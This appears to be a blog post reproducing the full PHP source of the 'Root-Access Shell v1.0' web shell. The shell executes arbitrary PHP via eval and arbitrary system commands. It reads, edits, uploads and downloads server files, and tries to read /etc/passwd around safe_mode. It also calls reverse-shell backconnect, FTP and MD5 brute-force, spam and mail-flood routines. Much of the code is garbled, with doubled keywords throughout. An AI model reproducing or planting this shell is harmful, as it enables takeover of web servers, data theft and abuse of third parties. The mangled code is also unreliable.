skip to main |
skip to sidebar
Root-Access Shel
<?phpini_set("session.gc_maxlifetime",1);session_start();error_reporting(0);safe_mode();
if(if($_POST['type']==11){download(stripslashes($_POST['value']));};
function function download($dfilename)
{{$file=fopen($dfilename,"r");ob_clean();$filename = basename($dfilename);$filedump = fread($file,@filesize($dfilename));fclose($file);header("Content-type: ".$mime_type);header("Content-disposition: attachment; filename=\"".$filename."\";");
echo echo $filedump;
}
function }function testperl()
{
if({if(ex('perl -h'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function view_size($size)
{
if({if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif(elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif(elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {else {$size = $size . " B";}
return return $size;
}
function }function testfetch()
{
if({if(ex('fetch --help'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function testwget()
{
if({if(ex('wget --help'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function oracle()
{
if({if(function_exists('ocilogon'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function postgresql()
{
if({if(function_exists('pg_connect'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function testmssql()
{
if({if(function_exists('mssql_connect'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function testcurl()
{
if({if(function_exists('curl_version'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function testmysql()
{
if({if(function_exists('mysql_connect'))
{
return {return "<font size=2 color=#29a329>ON</font>";
}else{
return }else{return "<font size=2 color=#ff4500>OFF</font>";
}
}
function }}function safe_mode()
{
if(!{if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3)
{{$_SESSION['safe_mode'] = 1;
return return "<font size=2 color=#29a329>ON</font>";
}else{}else{$_SESSION['safe_mode'] = 0;
return return "<font size=2 color=#ff4500>OFF</font>";
}
};
function }};function ex($in)
{{$out = '';
if(if(function_exists('exec'))
{{exec($in,$out);$out = join("\n",$out);
}
elseif(}elseif(function_exists('passthru'))
{{ob_start();passthru($in);$out = ob_get_contents();ob_end_clean();
}
elseif(}elseif(function_exists('system'))
{{ob_start();system($in);$out = ob_get_contents();ob_end_clean();
}
elseif(}elseif(function_exists('shell_exec'))
{{$out = shell_exec($in);
}
elseif(}elseif(is_resource($f = popen($in,"r")))
{{$out = "";
while(!@while(!@feof($f)) { $out .= fread($f,1024); }pclose($f);
}
return }return $out;
}
function }
function shell()
{
if({if($_POST['type']==1)
{
eval({eval(stripslashes($_POST['value']));
}
elseif(}elseif($_POST['type']==2)
{{pwd();print_r(ex(stripslashes($_POST['value'])));
}
elseif(}elseif($_POST['type']==3)
{
if({if($_SESSION['safe_mode'] == 1){
if((if(($u=safe_ex('ls -la'))!='')
{return {return $u;}else{return safe_ex('dir');};
}else{
if((
}else{if(($u=ex('ls -la'))!='')
{return {return $u;}else{return ex('dir');};
}
}
elseif(}}elseif($_POST['type']==4)
{
if({if(file_exists(stripslashes($_POST['value'])))
{
if({if($safe_mode!=1){
echo echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
}else{
echo }else{echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
};};$_SESSION['edit']=1;$_SESSION['filename'] = $_POST['value'];
}else{
return }else{return 'File doesn\'t exists!';
}
}
elseif(}}elseif($_POST['type']==5)
{{fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
}
elseif(}elseif($_POST['type']==6)
{{$uploaddir = pwd();
if(!if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
}
elseif(}elseif($_POST['type']==7)
{
echo {echo alias($_POST['value']);
}
elseif(}elseif($_POST['type']==8)
{
echo {echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
}
elseif(}elseif($_POST['type']==9)
{
echo {echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
}
elseif(}elseif($_POST['type']==10)
{
echo {echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
}
elseif(}elseif($_POST['type']==12)
{
echo {echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
}
elseif(}elseif($_POST['type']==13)
{
echo {echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
}
elseif(}elseif($_POST['type']==14)
{
echo {echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
}
else
{}else{$u = ex('ls -la');
if(if($u == ''){return ex('dir');}else{return $u;};
}
return }return null;
};
function };function edit()
{
if ({if ($_SESSION['edit'] == 1){$_SESSION['edit']=0;
return return "<br><center><input type=submit value=\"Save\"></center>";};
}
function }function getsystem()
{
return {return php_uname('s')." ".php_uname('r')." ".php_uname('v');
};
function };function getserver()
{
return {return getenv("SERVER_SOFTWARE");
};
function };function getuser()
{{$out = get_current_user();
if(if($out!="SYSTEM")
{
if(({if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
}
return }return $out;
};
function };function pwd()
{
if({if($_POST['type']==3)
{{$_SESSION['pwd'] = stripslashes($_POST['value']);
}}chdir($_SESSION['pwd']);$cwd = getcwd();
if(if($u=strrpos($cwd,'/'))
{
if({if($u!=strlen($cwd)-1){
return return $cwd.'/';}
else{return else{return $cwd;};
}
elseif(}elseif($u=strrpos($cwd,'\\'))
{
if({if($u!=strlen($cwd)-1){
return return $cwd.'\\';}
else{return else{return $cwd;};
};
}
function };}function safe_ex($in)
{
if({if($in){$d=dir('.');
while (while (false!==($file=$d->read()))
{
if ({if ($file=="." || $file=="..") continue;
@@clearstatcache();
list (list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!if(!$unix){
echo echo date("d.m.Y H:i",$mtime)." ";
if(@if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{}else{$owner = @posix_getpwuid($uid);$grgid = @posix_getgrgid($gid);
echo echo $inode." ";
echo echo perms(@fileperms($file));printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo echo date("d.m.Y H:i ",$mtime);
}
echo }echo "$file\n";
}}$d->close();
}
function }function safe_read($in)
{
echo {echo ini_get("safe_mode");
echo echo ini_get("open_basedir");
include(include("/etc/passwd");ini_restore("safe_mode");ini_restore("open_basedir");
echo echo ini_get("safe_mode");
echo echo ini_get("open_basedir");file_get_contents($in);
}
}}}?><html><head><title>Root-Access Shell</title><META http-equiv="Content-Type" content="text/html; charset=CP866"><style type=text/css>BODY { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 11px;margin: 0px;padding: 0px;text-align: center;color: #e7e7eb;background-color: #242629;}TABLE, TR, TD { font-family: Verdana, Tahoma, Arial, sans-serif;font-size: 12px;color: #e7e7eb;}.contentb {background-color: #44474f;}.t { padding: 6px;background-color: #242629;}input,textarea,select{background: #44474f;border: 1px solid #242629;color: #e7e7eb;font-family: verdana, helvetica, sans-serif;font-size: 11px;margin: 5px;padding: 2px;vertical-align: middle;}</style></head><body bgcolor='#242629'><br><center>
<table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;><tr><th class=t align=left><b>Server Info</b></th></tr><tr><td class=contentb><table border="0" width="100%"><tr><td width="35%" >System: <font size=2 color=#ff4500><b><?php echo getsystem();?></b></font></td><td width="15%" >PHP-version: <font size=2 color=#29a329><?php echo phpversion();?></font></td><td width="15%" >Oracle: <?php echo oracle();?></td><td width="25%" >Safe_mode: <?php echo safe_mode();?></td></tr><tr><td width="35%" >Server: <font size=2 color=#ff4500><b><?php echo getserver();?></b></font></td><td width="15%" >MySQL: <?php echo testmysql();?></td><td width="15%" >cURL: <?php echo testcurl();?></td><td width="25%" >Total space: <?php echo view_size(disk_total_space(getcwd()));?></td></tr><tr><td width="35%" >PWD: <font size=2 color=#ff4500><b><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></b></font></td><td width="15%" >PostgreSQL: <?php echo postgresql();?></td><td width="15%" >WGet: <?php echo testwget();?></td><td width="25%" >Free space: <?php echo view_size(diskfreespace(getcwd()));?></td></tr><tr><td width="35%" >User: <font size=2 color=#ff4500><b><?php echo getuser();?></b></font></td><td width="15%" >MSSQL: <?php echo testmssql();?></td><td width="15%" >Perl: <?php echo testperl();?></td><td width="25%" >Server time: <?php echo date('H:i d-m-Y');?></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;><tr><th class=t align=left><b>Shell</b></th></tr><tr><td class=contentb><center><form action method=POST><input type=hidden name="type" value=5><textarea cols=150 rows=20 name="value"><?php echo htmlspecialchars(shell());?></textarea><?php echo edit();?></form><table border="0" width="100%"><tr><td width="50%" align="center"><form action method=POST><b>Enter comand:</b><input type=hidden name="type" value=2><input type=text name="value" size=45><input type=submit value="Enter"></form></td><td width="50%" align="center"><form action method=POST><b>PWD:</b> <input type=text name="value" size=51 value=<?php echo pwd();?>><input type=hidden name="type" value=3><input type=submit value="Enter"></form></td></tr></table></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;><tr><th class=t align=left><b>Tools</b></th></tr><tr><td class=contentb><form action method=POST><b>Edit file:</b><input type=hidden name="type" value=4><input type=text name="value" size=72 value=<?php echo pwd();?>><input type=submit value="Edit"></form><form action method=POST><b>Download:</b><input type=hidden name="type" value=11><input type=text name="value" size=71 value=<?php echo pwd();?>><input type=submit value="Download"></form><form enctype="multipart/form-data" action method=POST><b>Upload:</b><input type=hidden name="type" value=6><input type=file name="userfile" size=28><input type=hidden name="type" value=6>New name:<input type=text size=35 name="newname"><input type=submit value="Upload"></form></td></tr></table><table width=95% border=0 cellspacing=1 cellpadding=1 bgcolor=#646c71 style=border-color: #000000;><tr><th class=t align=left><b>Copyright</b></th></tr><tr><td class=contentb><center><a href="http://forum.root-access.ru"><font size=2 color=#e7e7eb>Root-Access Shell v1.0</font></a></center><img src="http://flyphoto.us/images/shell.jpg"/></td></tr></table><br></center></body></html>
Posting Komentar
Masih bingung ? Tinggalkan komentar kamu ~